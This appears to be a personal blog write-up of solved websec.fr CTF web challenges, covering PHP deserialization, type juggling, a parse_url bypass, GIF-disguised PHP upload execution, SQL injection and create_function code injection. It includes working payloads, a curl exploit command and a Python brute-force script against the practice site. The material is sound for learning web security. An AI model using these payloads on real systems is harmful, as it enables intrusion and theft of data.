---
title: "Websecfr Write-Up"
date: 2021-12-21T23:52:47+01:00
draft: false
categories:
    - CTF
tags:
    - WEB
    - PHP
    - SQLi
    - CTF
    - Deserialization
    - Type Juggling
---

# WEBSEC CHALLENGES WRITE-UP

[websec.fr](https://websec.fr/) it's a web-oriented CTF, where we have easy to hard challenges and here are the levels I solved. Hope you enjoy it 😊 !!

# [*] INDEX:

- [LEVEL 04](#level-04)
- [LEVEL 17](#level-17)
- [LEVEL 25](#level-25)
- [LEVEL 08](#level-08)
- [LEVEL 10](#level-10)
- [LEVEL 12](#level-12)
- [LEVEL 13](#level-13)
- [LEVEL 15](#level-15)

## LEVEL 04

In this challenge we will deal with deserialization, if we take a look at the code we can see this : 

```php
if (isset ($_COOKIE['leet_hax0r'])) {
    $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));
    try {
        if (is_array($sess_data) && $sess_data['ip'] != $_SERVER['REMOTE_ADDR']) {
            die('CANT HACK US!!!');
        }
    } catch(Exception $e) {
        echo $e;
    }
```

The cookie "leet_hax0r" ir being unproperly unserialized, insecure deserialization vulnerabilities happen when applications deserialize objects without proper sanitization, an attacker can then manipulate serialized objects to change the program’s flow we can make our own malicious serialized cookie. If we look at source 2 we'll realize that it is a SQL class :

```php
<?php
class SQL {
    public $query = '';
    public $conn;
    public function __construct() {
    }
    
    public function connect() {
        $this->conn = new SQLite3 ("database.db", SQLITE3_OPEN_READONLY);
    }

    public function SQL_query($query) {
        $this->query = $query;
    }

    public function execute() {
        return $this->conn->query ($this->query);
    }

    public function __destruct() {
        if (!isset ($this->conn)) {
            $this->connect ();
        }
        
        $ret = $this->execute ();
        if (false !== $ret) {    
            while (false !== ($row = $ret->fetchArray (SQLITE3_ASSOC))) {
                echo '<p class="well"><strong>Username:<strong> ' . $row['username'] . '</p>';
            }
        }
    }
}
?>
```

Once here we have to recreate the same object and then serialize it :

```php
<?php
class SQL {
    public $query = "SELECT password as username from users;"
}
$obj = new SQL();
echo urldecode(base64_encode(serialize( $obj)));
?> 
```

output : `TzozOiJTUUwiOjE6e3M6NToicXVlcnkiO3M6Mzk6IlNFTEVDVCBwYXNzd29yZCBhcyB1c2VybmFtZSBmcm9tIHVzZXJzOyI7fQ==`

```
$ curl -v --cookie "leet_hax0r=TzozOiJTUUwiOjE6e3M6NToicXVlcnkiO3M6Mzk6IlNFTEVDVCBwYXNzd29yZCBhcyB1c2VybmFtZSBmcm9tIHVzZXJzOyI7fQ==" https://websec.fr/level04/index.php | grep WEBSEC
```

> WEBSEC{...}

## LEVEL 17

In this challenge we will deal with strcasecmp() function comparison bypass. If this function is used for any authentication check (like checking the password) and the user controls one side of the comparison, he can send an empty array instead of a string as the value of the password and bypass this check.

### Source Code :
```php
<?php
if (! strcasecmp ($_POST['flag'], $flag))
    echo '<div class="alert alert-success">Here is your flag: <mark>' . $flag . '</mark>.</div>';   
else
    echo '<div class="alert alert-danger">Invalid flag, sorry.</div>';
?>
```

### Requests :
```
# DEFAULT REQUEST
flag=whatever&submit=Go

# MALICIOUS REQUEST
flag[]=&submit=Go
```

> WEBSEC{...}

## LEVEL 25

In this challenge we will deal with url_parse() :

### Source Code :
```php
<?php
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}
?>
```

The parameter flag must be in the url, otherwise the contional will return "True" and the program will stop. To avoid this we have to make parse_url() return False, but how can we do this? Let's debug :

```php
$url = "http://google.com/path";
var_dump(parse_url($url));

>> output

array(3) {
  ["scheme"]=>
  string(4) "http"
  ["host"]=>
  string(10) "google.com"
  ["path"]=>
  string(5) "/path"
}
```

But we can manipulate the url :

```php
$url = "http:///google.com/path";
var_dump(parse_url($url));

>> output
bool(false)

------------------------------------

$url = "http:///google.com/path&a=:8080";
var_dump(parse_url($url));

>> output
bool(false)
```

Recreating our url, the result would be : 
```
http:///websec.fr/level25/index.php?page=flag
http://websec.fr/level25/index.php?page=flag&a=:8000
```

> WEBSEC{...}

## LEVEL 08

In this challenge we have to bypass exif_imagetype() function and run arbitrary code due to include_once().

```php
if ($_FILES['fileToUpload']['size'] <= 50000) {
                        if (getimagesize ($_FILES['fileToUpload']['tmp_name']) !== false) {
                            if (exif_imagetype($_FILES['fileToUpload']['tmp_name']) === IMAGETYPE_GIF) {
                                move_uploaded_file ($_FILES['fileToUpload']['tmp_name'], $uploadedFile);
                                echo '<p class="lead">Dump of <a href="/level08' . $uploadedFile . '">'. htmlentities($_FILES['fileToUpload']['name']) . '</a>:</p>';
                                echo '<pre>';
                                include_once($uploadedFile);
                                echo '</pre>';
                                unlink($uploadedFile);
```

We'll be uploading php code as a gif, but in the first place we have to deal with magic bytes and make the server recognize our file as a gif, we'll be running the following code :

```
printf 'GIF89a\x64\x00\x64\x00\x80' > script.php.gif
```

Now the server will save our file, once saved the include_once() function will execute the file, in this case our php file, so I'll be running this :

```
printf '<?php echo "\\nPHP ". PHP_SAPI ." on ". system("ls");'  >> script.php.gif
```

Now when we upload the file we can see the following output :

```
PHP fpm-fcgi on 
```

So this works, let's grab the flag with :

```
printf 'GIF89a\x64\x00\x64\x00\x80' > script.php.gif
printf '<?php echo "\\nPHP ". PHP_SAPI ." on ". var_dump(file_get_contents("flag.txt"));'  >> script.php.gif
```

> WEBSEC{...}

## LEVEL 10

In this challenge we will deal with Type Juggling in PHP with the presence of a loose comparison (==), this has a set of operand conversion rules to make it easier for developers, but this could lead to some unintended behaviour. Let's take a look at the loose comparison table :

![<- Not working](/static/HACKING/websec-1.png)

So taking that into account, let's check the source code :

```php
if (isset ($_REQUEST['f']) && isset ($_REQUEST['hash'])) {
    $file = $_REQUEST['f'];
    $request = $_REQUEST['hash'];

    $hash = substr (md5 ($flag . $file . $flag), 0, 8);

    echo '<div class="row"><br><pre>';
    if ($request == $hash) {
        show_source ($file);
    } else {
        echo 'Permission denied!';
    }
    echo '</pre></div>';
}
?>
```

The server creates a hash made by $flag + $file (user_input) + $flag, but $flag is a unknown variable (the first 8 characters, using substr()), and knowing the functionality of md5() the minimum change of the $file variable will change the hash completely. To complete this challenge, as said, we need to understand that loose comparisons doesn't check if both variables belong to the same type of variables (strings, integers, booleans...) unlike strict comparisons. Let's see an example :

```
php > var_dump(1=="1");
bool(true)
php > var_dump(1==="1");
bool(false)
```

In our case, we're dealing with loose type which also converts to decimal, for example 0e1337 equals to 0, let's see this example :

```php
php > var_dump("0e1337" == 0);
bool(true)
php > var_dump("0e1337" === 0);
bool(false)
```

So, every number that starts with "0e" and is followed by numbers will equal to 0. We know that flag.php is the file we're interested in, and we also know that `flag.php` is equal to `./flag.php` and `.///flag.php`, and as said with md5() functionality, the minimum alteration will change completely the hash value, and the fact that substr() filters the first 8 characters makes possible the bruteforce of the hash till we get "0eRandomNumbers". In my case I made this script :

```py
import requests

url = "https://websec.fr:443/level10/index.php"
filename = "./flag.php"
i = 1

while True:

    data = {
            "f": filename, 
            "hash": "0"
        }

    r = requests.post(url, data=data)
    if "Permission denied!" in r.text:
        filename = "." + "/" * i + "flag.php"
        i+=1
        pass

    else:
        print("[!] Filname : " + filename)
        break
```

Filename : 
```
./////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////flag.php
```

Secret Hash : 0

> WEBSEC{...}

## LEVEL 12

In this challenge we will deal with a blacklisted SQL Injection, we can see the following code :

```php
    $special1 = ["!", "\"", "#", "$", "%", "&", "'", "*", "+", "-"];
    $special2 = [".", "/", ":", ";", "<", "=", ">", "?", "@", "[", "\\", "]"];
    $special3 = ["^", "_", "`", "{", "|", "}"];
    $sql = ["union", "0", "join", "as"];
    $blacklist = array_merge ($special1, $special2, $special3, $sql);
    foreach ($blacklist as $value) {
        if (stripos($table, $value) !== false)
            exit("Presence of '" . $value . "' detected: abort, abort, abort!\n");
    }
```

All those characters and words will be blacklisted and checked by stripos() function, we cannot use "union" as well as "&" or "as". So let's see the query used :

```php
$query = 'SELECT id,username FROM ' . $table . ' WHERE id = ' . $id;
//$query = 'SELECT id,username,enemy FROM ' . $table . ' WHERE id = ' . $id;
```

There is a comment that mentions the column "enemy", this could be useful. We can create a payload with a subquery like the following code :

```
$table = 
SELECT 3 id,enemy username FROM costume

$query = 
SELECT id,username FROM (SELECT+3+id,+enemy+username+FROM+costume) WHERE id = 3
```

We will select `id` and `username`, from a subquery that selects `id` as 3, and `enemy` as `username`, so we'll be getting `id = 2` and `username = enemy`, and finally we must select 3 as id due to the fact that otherwise id will be discarded.

Final request : 

```
user_id=3&table=(SELECT+3+id,+enemy+username+FROM+costume)&submit=Enviar
```

> WEBSEC{...}

## LEVEL 13

In this level we'll deal with the understanding of the "for" and "unset" functionality, and how a bad implementation of this can lead to ignore the user input data. 

In the website we see that we can enter a series of number as `1,2,3` and a query will be performed giving us back the output. Let's see the source code :

```php
$tmp = explode(',',$_GET['ids']);

  
for ($i = 0; $i < count($tmp); $i++ ) {
    $tmp[$i] = (int)$tmp[$i];
    if( $tmp[$i] < 1 ) {
        unset($tmp[$i]);
    }
}
```

"explode" will turn our input into an array, for example `1,2,3` would be :
```php
array(3) {
  [0]=>
  string(1) "1"
  [1]=>
  string(1) "2"
  [2]=>
  string(1) "3"
}
```

"for" function works with a condition, in this case :

```
$i = 0; $i < count($tmp); $i++
```

So "for" only will be performed if $i is smaller than the number of fields in the array, and if we take a look again at the code we can see that if the input is 0, the array field will be deleted, and then the value of count($tmp) will be equal to $i and "for" will break. 
```php
if( $tmp[$i] < 1 ) {
            unset($tmp[$i]);
}
```

So we can inject anything after a 0, for every 0, we can inject an element that won't be evaluated. 

Payload : `1,0,0,0,2 )) UNION SELECT user_password,user_name,user_id FROM users --`

> WEBSEC{...}

## LEVEL 15

In this level we'll deal with a implementation of a vulnerable function. In this case create_function() : 

```php
if (isset ($_POST['c']) && !empty ($_POST['c'])) {
    $fun = create_function('$flag', $_POST['c']);
    print($success);
    //fun($flag);
    if (isset($_POST['q']) && $_POST['q'] == 'checked') {
        die();
    }
}
```

This function is vulnerable agains code injection, with the following payload :

```
return -1 * var_dump($a[""]);}echo $flag;/*"]
```

> WEBSEC{...}

# THANKS FOR READING 😊 !!
